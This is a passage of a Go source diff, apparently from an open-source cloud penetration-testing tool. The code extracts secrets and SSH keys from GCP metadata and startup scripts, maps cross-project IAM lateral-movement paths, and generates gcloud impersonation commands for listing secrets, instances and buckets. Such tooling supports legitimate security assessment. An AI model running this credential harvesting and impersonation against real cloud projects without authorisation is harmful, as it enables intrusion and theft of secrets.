:= strings.Split(content, "\n") + + for _, line := range lines { + line = strings.TrimSpace(line) + + // Skip empty lines and comments + if line == "" || strings.HasPrefix(line, "#") { + continue + } + + // Pattern 1: Shell style - export VAR=value or VAR=value + if strings.Contains(line, "=") { + // Handle export statements and YAML list items + testLine := strings.TrimPrefix(line, "export ") + testLine = strings.TrimPrefix(testLine, "- ") + testLine = strings.TrimPrefix(testLine, "| ") + testLine = strings.TrimSpace(testLine) + + parts := strings.SplitN(testLine, "=", 2) + if len(parts) == 2 { + key := strings.TrimSpace(parts[0]) + value := strings.TrimSpace(parts[1]) + // Remove quotes from value + value = strings.Trim(value, "\"'`") + // Clean up key + key = strings.TrimLeft(key, "- |>") + key = strings.TrimSpace(key) + + // Only consider valid variable names with actual values + if isValidVarName(key) && len(value) >= 3 && !isPlaceholderValue(value) { + if sensitiveType := detectSensitiveType(key); sensitiveType != "" { + dedupeKey := key + ":" + value + if !seen[dedupeKey] { + seen[dedupeKey] = true + items = append(items, SensitiveItem{ + Key: key, + Value: value, + Type: sensitiveType, + MetadataKey: metadataKey, + }) + } + } + } + } + } + + // Pattern 2: YAML style "key: value" - only for direct assignments + if strings.Contains(line, ": ") && !strings.HasPrefix(line, "#") && !strings.Contains(line, "=") { + parts := strings.SplitN(line, ": ", 2) + if len(parts) == 2 { + key := strings.TrimSpace(parts[0]) + value := strings.TrimSpace(parts[1]) + // Clean up key + key = strings.TrimLeft(key, "- ") + key = strings.TrimSpace(key) + // Remove quotes from value + value = strings.Trim(value, "\"'`") + + // Skip YAML block indicators and empty values + if value != "" && value != "|" && value != ">" && len(value) >= 3 && !isPlaceholderValue(value) { + if sensitiveType := detectSensitiveType(key); sensitiveType != "" { + dedupeKey := key + ":" + value + if !seen[dedupeKey] { + seen[dedupeKey] = true + items = append(items, SensitiveItem{ + Key: key, + Value: value, + Type: sensitiveType, + MetadataKey: metadataKey, + }) + } + } + } + } + } + + // Pattern 3: JSON style "key": "value" + if strings.Contains(line, "\":") { + parts := strings.SplitN(line, "\":", 2) + if len(parts) == 2 { + keyPart := parts[0] + if idx := strings.LastIndex(keyPart, "\""); idx >= 0 { + key := keyPart[idx+1:] + value := strings.TrimSpace(parts[1]) + value = strings.Trim(value, " ,\"'`") + + if len(value) >= 3 && !isPlaceholderValue(value) { + if sensitiveType := detectSensitiveType(key); sensitiveType != "" { + dedupeKey := key + ":" + value + if !seen[dedupeKey] { + seen[dedupeKey] = true + items = append(items, SensitiveItem{ + Key: key, + Value: value, + Type: sensitiveType, + MetadataKey: metadataKey, + }) + } + } + } + } + } + } + } + + return items +} + +// isPlaceholderValue checks if a value looks like a placeholder rather than a real secret +func isPlaceholderValue(value string) bool { + valueLower := strings.ToLower(value) + placeholders := []string{ + "xxx", "your_", "your-", "?/~`") { + return true + } + return false +} + +// isValidVarName checks if a string looks like a valid variable name +func isValidVarName(s string) bool { + if s == "" { + return false + } + // Variable names typically start with letter or underscore + first := s[0] + if !((first >= 'a' && first <= 'z') || (first >= 'A' && first <= 'Z') || first == '_') { + return false + } + // Rest can be alphanumeric or underscore + for _, c := range s[1:] { + if !((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || c == '_') { + return false + } + } + return true +} + +// detectInstanceType determines the type of instance based on labels and name patterns +func detectInstanceType(instance *compute.Instance) InstanceType { + if instance == nil { + return InstanceTypeStandalone + } + + labels := instance.Labels + name := instance.Name + + // Check labels first (most reliable) + if labels != nil { + // GKE nodes have goog-gke-node label + if _, ok := labels["goog-gke-node"]; ok { + return InstanceTypeGKE + } + // Also check for gke-cluster label + if _, ok := labels["gke-cluster"]; ok { + return InstanceTypeGKE + } + + // Dataproc nodes have goog-dataproc-cluster-name label + if _, ok := labels["goog-dataproc-cluster-name"]; ok { + return InstanceTypeDataproc + } + + // Dataflow workers have goog-dataflow-job-id label + if _, ok := labels["goog-dataflow-job-id"]; ok { + return InstanceTypeDataflow + } + + // Cloud Composer workers have goog-composer-environment label + if _, ok := labels["goog-composer-environment"]; ok { + return InstanceTypeComposer + } + + // Vertex AI Workbench / AI Platform Notebooks + if _, ok := labels["goog-notebooks-instance"]; ok { + return InstanceTypeNotebooks + } + // Also check for workbench label + if _, ok := labels["goog-workbench-instance"]; ok { + return InstanceTypeNotebooks + } + + // Cloud Batch jobs have goog-batch-job-uid label + if _, ok := labels["goog-batch-job-uid"]; ok { + return InstanceTypeBatchJob + } + + // App Engine Flex instances + if _, ok := labels["goog-appengine-version"]; ok { + return InstanceTypeAppEngine + } + if _, ok := labels["gae_app"]; ok { + return InstanceTypeAppEngine + } + } + + // Check name patterns as fallback + // GKE node names typically follow pattern: gke-{cluster}-{pool}-{hash} + if strings.HasPrefix(name, "gke-") { + return InstanceTypeGKE + } + + // Dataproc nodes: {cluster}-m (master) or {cluster}-w-{n} (worker) + if strings.Contains(name, "-m") || strings.Contains(name, "-w-") { + // This is too generic, rely on labels instead + } + + // Check for created-by metadata which indicates MIG + if instance.Metadata != nil { + for _, item := range instance.Metadata.Items { + if item != nil && item.Key == "created-by" && item.Value != nil { + if strings.Contains(*item.Value, "instanceGroupManagers") { + return InstanceTypeMIG + } + } + } + } + + return InstanceTypeStandalone +} + +// parseBootDiskEncryption checks the boot disk encryption type +func parseBootDiskEncryption(disks []*compute.AttachedDisk) (encryptionType, kmsKey string) { + encryptionType = "Google-managed" + + for _, disk := range disks { + if disk == nil || !disk.Boot { + continue + } + + if disk.DiskEncryptionKey != nil { + if disk.DiskEncryptionKey.KmsKeyName != "" { + encryptionType = "CMEK" + kmsKey = disk.DiskEncryptionKey.KmsKeyName + } else if disk.DiskEncryptionKey.Sha256 != "" { + encryptionType = "CSEK" + } + } + break // Only check boot disk + } + + return +} + +// getLastSnapshotForDisks gets the most recent snapshot date for any of the given disks +func (ces *ComputeEngineService) getLastSnapshotForDisks(service *compute.Service, projectID string, disks []*compute.AttachedDisk) string { + ctx := context.Background() + + // Collect all disk names from the instance + diskNames := make(map[string]bool) + for _, disk := range disks { + if disk == nil || disk.Source == "" { + continue + } + // Extract disk name from source URL + // Format: projects/{project}/zones/{zone}/disks/{diskName} + parts := strings.Split(disk.Source, "/") + if len(parts) > 0 { + diskNames[parts[len(parts)-1]] = true + } + } + + if len(diskNames) == 0 { + return "" + } + + // List all snapshots in the project and find ones matching our disks + var latestSnapshot string + req := service.Snapshots.List(projectID) + err := req.Pages(ctx, func(page *compute.SnapshotList) error { + for _, snapshot := range page.Items { + if snapshot == nil || snapshot.SourceDisk == "" { + continue + } + // Extract disk name from source disk URL + parts := strings.Split(snapshot.SourceDisk, "/") + if len(parts) > 0 { + diskName := parts[len(parts)-1] + if diskNames[diskName] { + // Compare timestamps - keep the most recent + if latestSnapshot == "" || snapshot.CreationTimestamp > latestSnapshot { + latestSnapshot = snapshot.CreationTimestamp + } + } + } + } + return nil + }) + + if err != nil { + // Silently fail - user may not have permission to list snapshots + return "" + } + + return latestSnapshot +} + +// FormatScopes formats service account scopes for display +func FormatScopes(scopes []string) string { + if len(scopes) == 0 { + return "-" + } + + // Shorten scope URLs for display + var shortScopes []string + for _, scope := range scopes { + // Extract the scope name from the URL + parts := strings.Split(scope, "/") + if len(parts) > 0 { + shortScopes = append(shortScopes, parts[len(parts)-1]) + } + } + return strings.Join(shortScopes, ", ") +} + +// GetProjectMetadata retrieves project-level compute metadata +func (ces *ComputeEngineService) GetProjectMetadata(projectID string) (*ProjectMetadataInfo, error) { + ctx := context.Background() + computeService, err := ces.getService(ctx) + if err != nil { + return nil, err + } + + project, err := computeService.Projects.Get(projectID).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + info := &ProjectMetadataInfo{ + ProjectID: projectID, + RawMetadata: make(map[string]string), + } + + if project.CommonInstanceMetadata != nil { + for _, item := range project.CommonInstanceMetadata.Items { + if item == nil { + continue + } + + // Store all raw metadata (except ssh-keys which go to separate loot) + if item.Value != nil && item.Key != "ssh-keys" && item.Key != "sshKeys" { + info.RawMetadata[item.Key] = *item.Value + } + + // Check ALL metadata keys for sensitive patterns + if item.Value != nil { + if sensitiveType := detectSensitiveType(item.Key); sensitiveType != "" { + info.SensitiveMetadata = append(info.SensitiveMetadata, SensitiveItem{ + Key: item.Key, + Value: *item.Value, + Type: sensitiveType, + Source: "project", + MetadataKey: item.Key, + }) + } + // Also scan metadata VALUES for embedded env vars (e.g., VAR=value patterns) + valueItems := extractSensitiveFromScript(*item.Value, "metadata-value:"+item.Key) + for i := range valueItems { + valueItems[i].Source = "project" + } + info.SensitiveMetadata = append(info.SensitiveMetadata, valueItems...) + } + + switch item.Key { + case "ssh-keys", "sshKeys": + info.HasProjectSSHKeys = true + if item.Value != nil { + lines := strings.Split(*item.Value, "\n") + for _, line := range lines { + line = strings.TrimSpace(line) + if line != "" { + info.ProjectSSHKeys = append(info.ProjectSSHKeys, line) + } + } + } + case "startup-script": + info.HasProjectStartupScript = true + if item.Value != nil { + info.ProjectStartupScript = *item.Value + // Check startup script for sensitive patterns (env vars inside script) + sensitiveItems := extractSensitiveFromScript(*item.Value, "project-startup-script") + for i := range sensitiveItems { + sensitiveItems[i].Source = "project" + } + info.SensitiveMetadata = append(info.SensitiveMetadata, sensitiveItems...) + } + case "enable-oslogin": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + info.OSLoginEnabled = true + } + case "enable-oslogin-2fa": + if item.Value != nil && strings.ToLower(*item.Value) == "true" { + info.OSLogin2FAEnabled = true + } + case "serial-port-enable": + if item.Value != nil && *item.Value == "true" { + info.SerialPortEnabled = true + } + default: + // Track other custom metadata keys + if !isKnownMetadataKey(item.Key) { + info.CustomMetadataKeys = append(info.CustomMetadataKeys, item.Key) + } + } + } + } + + return info, nil +} + +// isKnownMetadataKey checks if a metadata key is a known system key +func isKnownMetadataKey(key string) bool { + knownKeys := map[string]bool{ + "ssh-keys": true, + "sshKeys": true, + "startup-script": true, + "startup-script-url": true, + "block-project-ssh-keys": true, + "enable-oslogin": true, + "enable-oslogin-2fa": true, + "serial-port-enable": true, + "google-compute-default-zone": true, + "google-compute-default-region": true, + "google-compute-enable-logging": true, + "google-compute-enable-ssh-agent": true, + } + return knownKeys[key] +} + +// GetInstanceIAMPolicy retrieves IAM policy for a specific instance +func (ces *ComputeEngineService) GetInstanceIAMPolicy(projectID, zone, instanceName string) (*InstanceIAMInfo, error) { + ctx := context.Background() + computeService, err := ces.getService(ctx) + if err != nil { + return nil, err + } + + policy, err := computeService.Instances.GetIamPolicy(projectID, zone, instanceName).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + info := &InstanceIAMInfo{ + InstanceName: instanceName, + Zone: zone, + ProjectID: projectID, + } + + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + + switch binding.Role { + case "roles/compute.admin", "roles/owner": + info.ComputeAdmins = append(info.ComputeAdmins, binding.Members...) + case "roles/compute.instanceAdmin", "roles/compute.instanceAdmin.v1": + info.InstanceAdmins = append(info.InstanceAdmins, binding.Members...) + case "roles/compute.osLogin", "roles/compute.osAdminLogin": + info.SSHUsers = append(info.SSHUsers, binding.Members...) + } + + // Check for specific permissions via custom roles (more complex detection) + if strings.HasPrefix(binding.Role, "projects/") || strings.HasPrefix(binding.Role, "organizations/") { + // Custom role - would need to check permissions, but we note the binding + info.InstanceAdmins = append(info.InstanceAdmins, binding.Members...) + } + } + + return info, nil +} + +// InstancesWithMetadata retrieves instances with full metadata content +func (ces *ComputeEngineService) InstancesWithMetadata(projectID string) ([]ComputeEngineInfo, *ProjectMetadataInfo, error) { + instances, err := ces.Instances(projectID) + if err != nil { + return nil, nil, err + } + + projectMeta, err := ces.GetProjectMetadata(projectID) + if err != nil { + // Don't fail if we can't get project metadata + projectMeta = &ProjectMetadataInfo{ProjectID: projectID} + } + + return instances, projectMeta, nil +} diff --git a/gcp/services/crossProjectService/crossProjectService.go b/gcp/services/crossProjectService/crossProjectService.go new file mode 100644 index 00000000..6ce5e10e --- /dev/null +++ b/gcp/services/crossProjectService/crossProjectService.go @@ -0,0 +1,879 @@ +package crossprojectservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + iam "google.golang.org/api/iam/v1" + logging "google.golang.org/api/logging/v2" + pubsub "google.golang.org/api/pubsub/v1" +) + +type CrossProjectService struct { + session *gcpinternal.SafeSession +} + +func New() *CrossProjectService { + return &CrossProjectService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *CrossProjectService { + return &CrossProjectService{ + session: session, + } +} + +// getResourceManagerService returns a Resource Manager service using cached session if available +func (s *CrossProjectService) getResourceManagerService(ctx context.Context) (*cloudresourcemanager.Service, error) { + if s.session != nil { + return sdk.CachedGetResourceManagerService(ctx, s.session) + } + return cloudresourcemanager.NewService(ctx) +} + +// getIAMService returns an IAM service using cached session if available +func (s *CrossProjectService) getIAMService(ctx context.Context) (*iam.Service, error) { + if s.session != nil { + return sdk.CachedGetIAMService(ctx, s.session) + } + return iam.NewService(ctx) +} + +// getLoggingService returns a Logging service using cached session if available +func (s *CrossProjectService) getLoggingService(ctx context.Context) (*logging.Service, error) { + if s.session != nil { + return sdk.CachedGetLoggingService(ctx, s.session) + } + return logging.NewService(ctx) +} + +// getPubSubService returns a PubSub service using cached session if available +func (s *CrossProjectService) getPubSubService(ctx context.Context) (*pubsub.Service, error) { + if s.session != nil { + return sdk.CachedGetPubSubService(ctx, s.session) + } + return pubsub.NewService(ctx) +} + +// CrossProjectBinding represents a cross-project IAM binding +type CrossProjectBinding struct { + SourceProject string `json:"sourceProject"` // Where the principal is from + TargetProject string `json:"targetProject"` // Where access is granted + Principal string `json:"principal"` // The service account or user + PrincipalType string `json:"principalType"` // serviceAccount, user, group + Role string `json:"role"` // The IAM role granted + RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM, LOW + RiskReasons []string `json:"riskReasons"` // Why it's risky + ExploitCommands []string `json:"exploitCommands"` // Commands for exploitation +} + +// CrossProjectServiceAccount represents a service account that may have cross-project access +type CrossProjectServiceAccount struct { + Email string `json:"email"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + UniqueID string `json:"uniqueId"` + TargetAccess []string `json:"targetAccess"` // Other projects this SA can access +} + +// LateralMovementPath represents a potential lateral movement path +type LateralMovementPath struct { + SourceProject string `json:"sourceProject"` + SourcePrincipal string `json:"sourcePrincipal"` + TargetProject string `json:"targetProject"` + AccessMethod string `json:"accessMethod"` // e.g., "impersonation", "direct role" + TargetRoles []string `json:"targetRoles"` + PrivilegeLevel string `json:"privilegeLevel"` // ADMIN, WRITE, READ + ExploitCommands []string `json:"exploitCommands"` +} + +// CrossProjectLoggingSink represents a logging sink exporting to another project +type CrossProjectLoggingSink struct { + SourceProject string `json:"sourceProject"` // Project where sink is configured + SinkName string `json:"sinkName"` // Name of the logging sink + Destination string `json:"destination"` // Full destination (bucket, BQ, pubsub, etc) + DestinationType string `json:"destinationType"` // storage, bigquery, pubsub, logging + TargetProject string `json:"targetProject"` // Project where data is sent + Filter string `json:"filter"` // Log filter + RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM, LOW + RiskReasons []string `json:"riskReasons"` +} + +// CrossProjectPubSubExport represents a Pub/Sub subscription exporting to another project +type CrossProjectPubSubExport struct { + SourceProject string `json:"sourceProject"` // Project where subscription is + TopicProject string `json:"topicProject"` // Project where topic is + TopicName string `json:"topicName"` // Topic name + SubscriptionName string `json:"subscriptionName"` // Subscription name + ExportType string `json:"exportType"` // push, bigquery, cloudstorage + ExportDest string `json:"exportDest"` // Destination details + TargetProject string `json:"targetProject"` // Project where data is exported to + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// AnalyzeCrossProjectAccess analyzes cross-project IAM bindings for a set of projects. +// If orgCache is provided, it resolves project numbers to IDs for accurate detection. +func (s *CrossProjectService) AnalyzeCrossProjectAccess(projectIDs []string, orgCache *gcpinternal.OrgCache) ([]CrossProjectBinding, error) { + ctx := context.Background() + + crmService, err := s.getResourceManagerService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + var crossProjectBindings []CrossProjectBinding + + // Build a map of project IDs for quick lookup + projectMap := make(map[string]bool) + for _, pid := range projectIDs { + projectMap[pid] = true + } + + // Analyze IAM policy of each project + for _, targetProject := range projectIDs { + policy, err := crmService.Projects.GetIamPolicy(targetProject, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + continue // Skip projects we can't access + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + sourceProject := extractProjectFromMember(member, orgCache) + + // Check if this is cross-project access + if sourceProject != "" && sourceProject != targetProject { + // Check if source project is in our analysis scope + isFromKnownProject := projectMap[sourceProject] + + cpBinding := CrossProjectBinding{ + SourceProject: sourceProject, + TargetProject: targetProject, + Principal: member, + PrincipalType: extractPrincipalType(member), + Role: binding.Role, + RiskReasons: []string{}, + } + + // Analyze risk level + cpBinding.RiskLevel, cpBinding.RiskReasons = s.analyzeBindingRisk(binding.Role, member, isFromKnownProject) + cpBinding.ExploitCommands = s.generateExploitCommands(cpBinding) + + crossProjectBindings = append(crossProjectBindings, cpBinding) + } + } + } + } + + return crossProjectBindings, nil +} + +// GetCrossProjectServiceAccounts finds service accounts with cross-project access +func (s *CrossProjectService) GetCrossProjectServiceAccounts(projectIDs []string) ([]CrossProjectServiceAccount, error) { + ctx := context.Background() + + iamService, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + crmService, err := s.getResourceManagerService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + var crossProjectSAs []CrossProjectServiceAccount + + // Build a map of all service accounts by email -> project + saProjectMap := make(map[string]string) + allSAs := make(map[string]*CrossProjectServiceAccount) + + // List all service accounts in each project + for _, projectID := range projectIDs { + req := iamService.Projects.ServiceAccounts.List(fmt.Sprintf("projects/%s", projectID)) + err := req.Pages(ctx, func(page *iam.ListServiceAccountsResponse) error { + for _, sa := range page.Accounts { + saProjectMap[sa.Email] = projectID + allSAs[sa.Email] = &CrossProjectServiceAccount{ + Email: sa.Email, + ProjectID: projectID, + DisplayName: sa.DisplayName, + UniqueID: sa.UniqueId, + TargetAccess: []string{}, + } + } + return nil + }) + if err != nil { + continue // Skip on error + } + } + + // Now check each project's IAM policy for service accounts from other projects + for _, targetProject := range projectIDs { + policy, err := crmService.Projects.GetIamPolicy(targetProject, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if strings.HasPrefix(member, "serviceAccount:") { + email := strings.TrimPrefix(member, "serviceAccount:") + sourceProject := saProjectMap[email] + + // Cross-project access + if sourceProject != "" && sourceProject != targetProject { + if sa, exists := allSAs[email]; exists { + accessDesc := fmt.Sprintf("%s: %s", targetProject, binding.Role) + sa.TargetAccess = append(sa.TargetAccess, accessDesc) + } + } + } + } + } + } + + // Collect SAs with cross-project access + for _, sa := range allSAs { + if len(sa.TargetAccess) > 0 { + crossProjectSAs = append(crossProjectSAs, *sa) + } + } + + return crossProjectSAs, nil +} + +// FindLateralMovementPaths identifies lateral movement paths between projects. +// If orgCache is provided, it resolves project numbers to IDs for accurate detection. +func (s *CrossProjectService) FindLateralMovementPaths(projectIDs []string, orgCache *gcpinternal.OrgCache) ([]LateralMovementPath, error) { + ctx := context.Background() + + crmService, err := s.getResourceManagerService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + var paths []LateralMovementPath + + // Analyze each project pair + for _, sourceProject := range projectIDs { + for _, targetProject := range projectIDs { + if sourceProject == targetProject { + continue + } + + // Get target project IAM policy + policy, err := crmService.Projects.GetIamPolicy(targetProject, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + continue + } + + // Find principals from source project that have access to target + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + memberProject := extractProjectFromMember(member, orgCache) + if memberProject == sourceProject { + path := LateralMovementPath{ + SourceProject: sourceProject, + SourcePrincipal: member, + TargetProject: targetProject, + AccessMethod: "Direct IAM Role", + TargetRoles: []string{binding.Role}, + PrivilegeLevel: categorizePrivilegeLevel(binding.Role), + } + path.ExploitCommands = s.generateLateralMovementCommands(path) + paths = append(paths, path) + } + } + } + } + } + + return paths, nil +} + +// analyzeBindingRisk determines the risk level of a cross-project binding +func (s *CrossProjectService) analyzeBindingRisk(role, member string, isFromKnownProject bool) (string, []string) { + var reasons []string + score := 0 + + // High-privilege roles + highPrivRoles := map[string]bool{ + "roles/owner": true, + "roles/editor": true, + "roles/iam.serviceAccountTokenCreator": true, + "roles/iam.serviceAccountKeyAdmin": true, + "roles/iam.securityAdmin": true, + "roles/compute.admin": true, + "roles/storage.admin": true, + "roles/secretmanager.admin": true, + } + + if highPrivRoles[role] { + reasons = append(reasons, fmt.Sprintf("High-privilege role: %s", role)) + score += 3 + } + + // Admin/editor roles are always concerning + if strings.Contains(role, "admin") || strings.Contains(role, "Admin") { + reasons = append(reasons, "Role contains 'admin' permissions") + score += 2 + } + + if strings.Contains(role, "editor") || strings.Contains(role, "Editor") { + reasons = append(reasons, "Role contains 'editor' permissions") + score += 2 + } + + // Service account cross-project is higher risk than user + if strings.HasPrefix(member, "serviceAccount:") { + reasons = append(reasons, "Service account has cross-project access (can be automated)") + score += 1 + } + + // Unknown source project is concerning + if !isFromKnownProject { + reasons = append(reasons, "Access from project outside analyzed scope") + score += 1 + } + + if score >= 4 { + return "CRITICAL", reasons + } else if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +// generateExploitCommands generates exploitation commands for a cross-project binding +func (s *CrossProjectService) generateExploitCommands(binding CrossProjectBinding) []string { + var commands []string + + // Build impersonation flag if service account + impersonateFlag := "" + if binding.PrincipalType == "serviceAccount" { + email := strings.TrimPrefix(binding.Principal, "serviceAccount:") + impersonateFlag = fmt.Sprintf(" --impersonate-service-account=%s", email) + } + + roleLower := strings.ToLower(binding.Role) + + // Role-specific exploitation commands + if strings.Contains(roleLower, "owner") || strings.Contains(roleLower, "editor") { + commands = append(commands, + fmt.Sprintf("gcloud compute instances list --project=%s%s", binding.TargetProject, impersonateFlag), + fmt.Sprintf("gcloud secrets list --project=%s%s", binding.TargetProject, impersonateFlag), + fmt.Sprintf("gsutil ls -p %s", binding.TargetProject), + ) + } else if strings.Contains(roleLower, "storage") { + commands = append(commands, + fmt.Sprintf("gsutil ls -p %s", binding.TargetProject), + ) + } else if strings.Contains(roleLower, "compute") { + commands = append(commands, + fmt.Sprintf("gcloud compute instances list --project=%s%s", binding.TargetProject, impersonateFlag), + ) + } else if strings.Contains(roleLower, "secretmanager") { + commands = append(commands, + fmt.Sprintf("gcloud secrets list --project=%s%s", binding.TargetProject, impersonateFlag), + ) + } else if strings.Contains(roleLower, "bigquery") { + commands = append(commands, + fmt.Sprintf("bq ls --project_id=%s", binding.TargetProject), + fmt.Sprintf("bq query --project_id=%s 'SELECT * FROM INFORMATION_SCHEMA.TABLES'", binding.TargetProject), + ) + } else if strings.Contains(roleLower, "cloudsql") { + commands = append(commands, + fmt.Sprintf("gcloud sql instances list --project=%s%s", binding.TargetProject, impersonateFlag), + ) + } else if strings.Contains(roleLower, "serviceaccounttokencreator") || strings.Contains(roleLower, "serviceaccountkeyadmin") { + commands = append(commands, + fmt.Sprintf("gcloud iam service-accounts list --project=%s%s", binding.TargetProject, impersonateFlag), + ) + } + + return commands +} + +// generateLateralMovementCommands generates commands for lateral movement +func (s *CrossProjectService) generateLateralMovementCommands(path LateralMovementPath) []string { + var commands []string + + // Build impersonation flag if service account + impersonateFlag := "" + if strings.HasPrefix(path.SourcePrincipal, "serviceAccount:") { + email := strings.TrimPrefix(path.SourcePrincipal, "serviceAccount:") + impersonateFlag = fmt.Sprintf(" --impersonate-service-account=%s", email) + } + + // Add role-specific commands based on the most powerful role + for _, role := range path.TargetRoles { + roleLower := strings.ToLower(role) + if strings.Contains(roleLower, "owner") || strings.Contains(roleLower, "editor") { + commands = append(commands, + fmt.Sprintf("gcloud compute instances list --project=%s%s", path.TargetProject, impersonateFlag), + fmt.Sprintf("gcloud secrets list --project=%s%s", path.TargetProject, impersonateFlag), + fmt.Sprintf("gsutil ls -p %s", path.TargetProject), + ) + break // owner/editor covers everything, no need for more specific commands + } else if strings.Contains(roleLower, "storage") { + commands = append(commands, + fmt.Sprintf("gsutil ls -p %s", path.TargetProject), + ) + } else if strings.Contains(roleLower, "compute") { + commands = append(commands, + fmt.Sprintf("gcloud compute instances list --project=%s%s", path.TargetProject, impersonateFlag), + ) + } else if strings.Contains(roleLower, "secretmanager") { + commands = append(commands, + fmt.Sprintf("gcloud secrets list --project=%s%s", path.TargetProject, impersonateFlag), + ) + } else if strings.Contains(roleLower, "bigquery") { + commands = append(commands, + fmt.Sprintf("bq ls --project_id=%s", path.TargetProject), + ) + } + } + + return commands +} + +// extractProjectFromMember extracts the project ID from a member string. +// If orgCache is provided, it resolves project numbers to IDs. +func extractProjectFromMember(member string, orgCache *gcpinternal.OrgCache) string { + if !strings.HasPrefix(member, "serviceAccount:") { + return "" + } + + email := strings.TrimPrefix(member, "serviceAccount:") + parts := strings.Split(email, "@") + if len(parts) != 2 { + return "" + } + + prefix := parts[0] + domain := parts[1] + + // Helper to resolve a project number to ID via OrgCache + resolveNumber := func(number string) string { + if orgCache != nil && orgCache.IsPopulated() { + if resolved := orgCache.GetProjectIDByNumber(number); resolved != "" { + return resolved + } + } + return "" // Can't resolve without cache + } + + // Pattern: name@project-id.iam.gserviceaccount.com (regular SAs) + // But NOT gcp-sa-* domains (those are Google service agents with project numbers) + if strings.HasSuffix(domain, ".iam.gserviceaccount.com") && !strings.HasPrefix(domain, "gcp-sa-") { + projectPart := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") + return projectPart + } + + // Pattern: service-PROJECT_NUMBER@gcp-sa-*.iam.gserviceaccount.com + if strings.HasPrefix(domain, "gcp-sa-") && strings.HasSuffix(domain, ".iam.gserviceaccount.com") { + number := prefix + if strings.HasPrefix(prefix, "service-") { + number = strings.TrimPrefix(prefix, "service-") + } + if resolved := resolveNumber(number); resolved != "" { + return resolved + } + return "" + } + + // Pattern: PROJECT_ID@appspot.gserviceaccount.com + if domain == "appspot.gserviceaccount.com" { + return prefix // This is already a project ID + } + + // Pattern: PROJECT_NUMBER-compute@developer.gserviceaccount.com + if strings.HasSuffix(domain, "developer.gserviceaccount.com") { + if idx := strings.Index(prefix, "-compute"); idx > 0 { + number := prefix[:idx] + if resolved := resolveNumber(number); resolved != "" { + return resolved + } + } + return "" + } + + // Pattern: PROJECT_NUMBER@cloudservices.gserviceaccount.com + if domain == "cloudservices.gserviceaccount.com" { + if resolved := resolveNumber(prefix); resolved != "" { + return resolved + } + return "" + } + + // Pattern: PROJECT_NUMBER@cloudbuild.gserviceaccount.com + if domain == "cloudbuild.gserviceaccount.com" { + if resolved := resolveNumber(prefix); resolved != "" { + return resolved + } + return "" + } + + return "" +} + +// extractPrincipalType extracts the type of principal from a member string +func extractPrincipalType(member string) string { + if strings.HasPrefix(member, "serviceAccount:") { + return "serviceAccount" + } else if strings.HasPrefix(member, "user:") { + return "user" + } else if strings.HasPrefix(member, "group:") { + return "group" + } else if strings.HasPrefix(member, "domain:") { + return "domain" + } + return "unknown" +} + +// categorizePrivilegeLevel categorizes the privilege level of a role +func categorizePrivilegeLevel(role string) string { + if strings.Contains(role, "owner") || strings.Contains(role, "Owner") { + return "ADMIN" + } + if strings.Contains(role, "admin") || strings.Contains(role, "Admin") { + return "ADMIN" + } + if strings.Contains(role, "editor") || strings.Contains(role, "Editor") { + return "WRITE" + } + if strings.Contains(role, "writer") || strings.Contains(role, "Writer") { + return "WRITE" + } + if strings.Contains(role, "creator") || strings.Contains(role, "Creator") { + return "WRITE" + } + if strings.Contains(role, "viewer") || strings.Contains(role, "Viewer") { + return "READ" + } + if strings.Contains(role, "reader") || strings.Contains(role, "Reader") { + return "READ" + } + return "READ" // Default to READ for unknown +} + +// FindCrossProjectLoggingSinks discovers logging sinks that export to other projects +func (s *CrossProjectService) FindCrossProjectLoggingSinks(projectIDs []string) ([]CrossProjectLoggingSink, error) { + ctx := context.Background() + + loggingService, err := s.getLoggingService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + // Build project lookup map + projectMap := make(map[string]bool) + for _, p := range projectIDs { + projectMap[p] = true + } + + var crossProjectSinks []CrossProjectLoggingSink + + for _, sourceProject := range projectIDs { + parent := fmt.Sprintf("projects/%s", sourceProject) + req := loggingService.Projects.Sinks.List(parent) + err := req.Pages(ctx, func(page *logging.ListSinksResponse) error { + for _, sink := range page.Sinks { + // Parse destination to extract target project + destType, targetProject := parseLoggingDestination(sink.Destination) + + // Check if this is a cross-project sink + if targetProject != "" && targetProject != sourceProject { + riskLevel, riskReasons := analyzeLoggingSinkRisk(sink, targetProject, projectMap) + + crossSink := CrossProjectLoggingSink{ + SourceProject: sourceProject, + SinkName: sink.Name, + Destination: sink.Destination, + DestinationType: destType, + TargetProject: targetProject, + Filter: sink.Filter, + RiskLevel: riskLevel, + RiskReasons: riskReasons, + } + crossProjectSinks = append(crossProjectSinks, crossSink) + } + } + return nil + }) + if err != nil 